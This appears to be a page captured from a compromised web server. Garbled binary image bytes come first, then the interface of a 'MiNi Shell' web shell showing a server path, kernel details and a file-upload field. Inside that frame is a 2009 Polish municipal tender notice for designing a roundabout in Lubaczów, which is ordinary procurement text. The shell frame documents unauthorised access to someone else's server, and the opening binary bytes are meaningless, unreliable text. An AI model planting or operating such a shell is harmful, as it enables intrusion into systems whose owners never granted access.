JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70629-N-2009.html

<p class="kh_header"><b>Lubaczów: Opracowanie dokumentacji budowy ronda na skrzyżowaniu ul. Słowackiego, ul. Sienkiewicza i ul. Kościuszki w Lubaczowie, w ciągu drogi wojewódzkiej Nr 867</b><br>
<b>Numer ogłoszenia: 70629 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska w Lubaczowie (Burmistrz Miasta Lubaczowa) , ul. Rynek 26, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6328010, faks 016 6321191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji budowy ronda na skrzyżowaniu ul. Słowackiego, ul. Sienkiewicza i ul. Kościuszki w Lubaczowie, w ciągu drogi wojewódzkiej Nr 867.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu, wielkości i zakresu zamówienia:
1.1. Przedmiotem zamówienia jest: Opracowanie dokumentacji budowy ronda na skrzyżowaniu ul. Słowackiego, ul. Sienkiewicza i ul. Kościuszki w Lubaczowie, w ciągu drogi wojewódzkiej Nr 867.

1.2. Przy projektowaniu ronda w Lubaczowie w ciągu drogi wojewódzkiej Nr 867 należy uwzględnić następujące warunki:
- dokumentację geotechniczną niezbędną do opracowania rekonstrukcji nawierzchni należy wykonać z przystosowaniem do nośności 100 KN/oś.
- kategoria ruchu KR-4
- klasa drogi G
- prędkości projektowe 50 km/h
- parametry przekroju normalnego
- ilość jezdni 1
- do opracowania dokumentacji należy uwzględnić pomiar ruchu na rok 2005
- rodzaj wyboru skrzyżowania winien być uzasadniony analizą kierunku i potoku ruchu oraz funkcjonalnością w przyszłości
- ilość pasów ruchu 2
- jezdnia dla ronda 2 x 3,25m poza rondem 2 x 3,50 m+ lokalne poszerzenia na łukach i skrzyżowaniach,
- rozwiązać odwodnienie jezdni, chodników i przyległego terenu wg. przepisów o ochronie środowiska zaprojektować chodniki przy jezdni i poza jezdnią szer. 2,00m w przypadku ciągów pieszo-rowerowych szer. 2,5 m 
- przejścia dla pieszych winny być zaprojektowane wraz z azylem dla pieszych po obu stronach drogi, a ich lokalizacja również winna być uzgodniona przez Komisję Bezpieczeństwa Ruchu Drogowego
- zinwentaryzować zadrzewienie kolidujące z elementami projektowymi z podaniem ich kilometraża, wystąpić w imieniu PZDW o zezwolenie na wycinkę
- elementy projektowane należy nawiązać sytuacyjnie względem osi jezdni w aktualnym kilometrażu drogi
- uwzględnić znajdujące się w pasie drogowym instalacje podziemne
- uwzględnić konieczną zmianę lokalizacji oznakowania pionowego wszelkie odstępstwa od warunków zawartych w uzgodnieniu spowodowane kolizyjnymi sytuacjami w terenie należy uzgodnić w PZDW w Rzeszowie
Uwaga: technologię konstrukcji nawierzchni włączeń ruchu z drogi wojewódzkiej (zjazdy) dostosować do istniejącej w danej miejscowości.

1.3. Dokumentacja techniczna winna zawierać:
1. Projekt Budowlany - zawierający decyzje i uzgodnienia (szczególnie operaty wodnoprawne i środowiskowe) oraz umowy cywilno - prawne w przypadku wejścia w tereny obce (także dla przekładanych urządzeń obcych) w ilości koniecznej do uzyskania pozwolenia na budowę lub dokonania zgłoszenia.
2. Projekt Wykonawczy - 4 egz.
- branża drogowa z docelowym projektem organizacji ruchu inne branże - j eśli występuj ą,
- przedmiar robót i kosztorys inwestorski z zastosowaniem kodu WSZ (CPV)
z podziałem na wstępnie ustalone odcinki węzłowe bądź elementy rozliczeniowe,
- w kosztorysie i przedmiarze robót należy uwzględnić pozycje:
a) sporządzenie inwentaryzacji powykonawczej,
b) przeniesienie punktów stałych geodezyjnych,
c) próby szczelności - w przypadku projektowania kanalizacji deszczowej, do celów przetargowych należy sporządzić kompletną dokumentację w wersji elektronicznej (PDF)
- Szczegółowe Specyfikacje Techniczne
Dokumentacje Techniczna uwzględniajaca zalecenia i warunki niniejszego pisma należy uzgodnić w Podkarpackim Zarządzie Dróg Wojewódzkich w Rzeszowie,



1.4. Projektant występujący do PZDW o uzgodnienie rozwiązań projektowych winien:
1. Rozwiązania projektowe przedstawić na aktualnej mapie do celów projektowych w skali 1:500
z klauzulą ZUDP, oraz dołączyć aktualny wypis z rejestru gruntów zajętych pod projektowaną inwestycję i aktualną kopię mapy ewidencyjnej.
2. Przedłożyć domiary do jezdni i granicy sąsiadujących działek przyległych do pasa drogowego.
3. Sprawdzić czy wszystkie zjazdy i urządzenia drogowe występujące w terenie są ujęte na mapie sytuacyjnej (czy projekt przebudowy drogi nie ograniczy dostępności do działek przyległych)
4. Zaznaczyć wszystkie kolizje z urządzeniami obcymi, a szczególnie hydranty, zasuwy, sączki, szafy telekomunikacyjne i energetyczne z wejściami, rodzaj konstrukcji słupów itp.
5. Zaznaczyć cieki wodne, wodnice i obszary wymagające odwodnienia będące w bezpośrednim sąsiedztwie inwestycji.
6. Wykazać na mapie istniejące w terenie znaki punktów osnowy geodezyjnej w całym zakresie inwestycji
7. Na niwelecie chodnika nanieść rzędne, rowu, przepustów pod zjazdami, przepustów pod drogą z zaznaczeniem odpływów.
8. Projektowane urządzenia dowiązać lokalizacyjne do istniejących i projektowanych
zatok autobusowych, przystanków i przejść dla pieszych oraz innych urządzeń bezpieczeństwa ruchu (np. bariery, poręcze, łańcuchy, schody, itp.) - według obowiązującego kilometraża,
9. W przypadku konieczności wejścia w grunty obce (poza pas drogowy), przygotować kompletną dokumentację geodezyjną na ich wykup (podziały, operaty szacunkowe),
10.W terminie 2-ch tygodni przed złożeniem wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowych, projektant zorganizuje spotkanie z zarządem drogi w terenie okazując zamierzenia projektowe, a następnie dostarczy skompletowaną dokumentację na posiedzenie ZOPI. Protokół ZOPI jest dokumentem ostatecznie uzgadniającym projekt.
11. Złożyć wniosek o wydanie decyzji o zezwoleniu na realizację inwestycji drogowych do organu architektoniczno-budowlanego po uprzednim uzyskaniu pełnomocnictwa oraz oświadczenia o prawie do dysponowania gruntem na cele budowlane.
12. Dołączyć klauzulę kompletności opracowania.

1.5. Dokumentację techniczną należy opracować na podstawie:
- ustawy - Prawo Budowlane z dnia 7 lipca 1994 z późniejszymi zmianami, -ustawy - Prawo Ochrony Środowiska z dnia 27 kwietnia 2001 z późn. zmianami, -ustawy - Prawo Wodne z dnia 18 lipca 2001 z późniejszymi zmianami, -ustawy o drogach publicznych z dnia 21 marca 1985 roku z późn. zmianami, -ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym z późniejszymi zmianami
- ustawy o gospodarce nieruchomościami z dnia 21 sierpnia 1997 roku z późniejszymi zmianami,
- ustawy o ochronie gruntów rolnych i leśnych z dnia 3 lutego 1995 roku z późniejszymi zmianami,
- ustawy o lasach z dnia 28 września 1991 roku z późniejszymi zmianami,
- ustawy o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa z dnia 19 października 1991 roku z późniejszymi zmianami,
- ustawa Prawo o ruchu drogowym z dnia 20 czerwca 1997 roku z późn. Zmian.
- ustawa z dnia 25 lipca 2008 r. o zmianie ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych oraz o zmianie niektórych innych ustaw (Dz. U. z dnia 26 sierpnia 2008 r.)
- ustawa z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko(Dz. U. z dnia 7 listopada 2008 r.)
oraz zgodnie z Rozporządzeniami:
- Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie Dz. U. z 14.05.1999r,
- Ministra Infrastruktury z dnia 23 września 2003 w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonania nadzoru nad tym zarządzaniem Dz. U. zl4X. 2003r,
- Ministra Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipiec 2002 roku w sprawie znaków i sygnałów na drogach Dz. U. z 23 .XII.2003r, -Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie Dz. U. z 30.05.2006,
- Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02 1995r w sprawie
rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie. Dz.U.95.25.133
- Ministra Spraw Wewnętrznych i Administracji z dnia 24.09.1988r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych
Dz.U.Nrl26poz839
- Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, Dz. U. 120/03, poz. 1133.
- Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02 1995r w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie. Dz.U.95.25.133
- wszystkie pozostałe, obowiązujące ustawy i rozporządzenia ministerialne dotyczące warunków technicznych jakim powinny odpowiadać drogi publiczne

1.6. Po stronie Projektanta leży opracowanie podkładów geodezyjnych w zakresie niezbędnym do wykonania przedmiotu zamówienia (mapy do celów projektowych).
1.7. Przygotowanie niezbędnych materiałów i załączników do uzyskania decyzji zezwolenia na realizację inwestycji drogowej od organu administracji architektoniczno-budowlanej. 
1.8. Sporządzenie wersji elektronicznej przedmiotu zamówienia w zakresie niezbędnym do ogłoszenia przetargu na wykonanie robót.
1.9. Informacje dodatkowe:
Dokumentację należy opracować w oparciu o wytyczne określone w piśmie PZDW-WDT -7334/1/867/2009 z dnia 14.04.2009 r. Podkarpackiego Zarządu Dróg Wojewódzkich w Rzeszowie.
1.10. W zakresie dokumentacji jest uzyskanie także między innymi:
- Decyzji oraz innych uzgodnień, które mogą wyniknąć w trakcie procesu projektowego. O w/w decyzje należy wystąpić dla i w imieniu inwestora. Stosowne pełnomocnictwo zostanie wydane Jednostce Projektującej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 47.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki art.22 ust.1 i nie podlegają wykluczeniu z art.24 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu poprzez zweryfikowanie wymaganych dokumentów potwierdzających prawo do ubiegania się o przedmiotowe zamówienie publiczne metodą spełnia /nie spełnia. Wykonawcy, którzy nie spełnią choć jednego z warunków zostaną wykluczeni z postępowania, a ich oferty odrzucone. 

2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 

3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
3.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.4 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia 
3.5 zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88 Prawa zamówień publicznych, lub błędy w obliczeniu ceny 
3.6 wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny 
3.7 jest nieważna na podstawie odrębnych przepisów,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
1) Formularz ofertowy wykonawcy - zał. nr 1
2) Oświadczenie o spełnianiu warunków podanych w art. 22 ust. 1 pkt 1-3) ustawy - Załącznik nr 2
3) Oświadczenie o spełnianiu warunku podanego w art. 22 ust. 1 pkt 4 w związku z art. 24 ust. 1 pkt 1 - 9 ustawy - Załącznik Nr 3,
4) Wykaz osób i podmiotów, które będą wykonywać zamówienie - zał. nr 3
Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
5) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
6. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
7). Jeżeli w składanych przez wykonawcę w/w dokumentach brak jest danych o osobach upoważnionych do reprezentowania wykonawcy lub oferta jest podpisywana przez inne osoby niż wymienione w w/w dokumentach należy dołączyć właściwe umocowanie prawne.

B. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z §2 i §4 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605).


C. Dokumenty wymagane w przypadku składania oferty wspólnej: 
Składając ofertę wspólnie (art.23 ustawy Prawo zamówień publicznych) przez dwóch lub więcej Wykonawców należy zwrócić uwagę w szczególności na następujące wymagania:
a) następujące dokumenty i oświadczenia: 
- oferta,
- oświadczenie o spełnianiu warunków podanych w art. 22 ust. 1 pkt 1-3) ustawy (Załącznik Nr 2 do SIWZ),
podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum.

b) następujące dokumenty i oświadczenia: 
- oświadczenie o spełnianiu warunku podanego w art. 22 ust. 1 pkt 4 w związku z art. 24 ust. 1 pkt 1 - 9 ustawy (Załącznik Nr 3 do SIWZ),
- odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, 
składa każdy z członków konsorcjum w imieniu własnym.

D. Postanowienia dotyczące składanych dokumentów
1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubaczow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można odebrać w siedzibie Urzędu Miejskiego w Lubaczowie, ul. Rynek 26, pok.15 lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 11:00, miejsce: w siedzibie zamawiającego 
Urząd Miejski w Lubaczowie
ul. Rynek 26, 37-600 Lubaczów
pokój nr 7, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com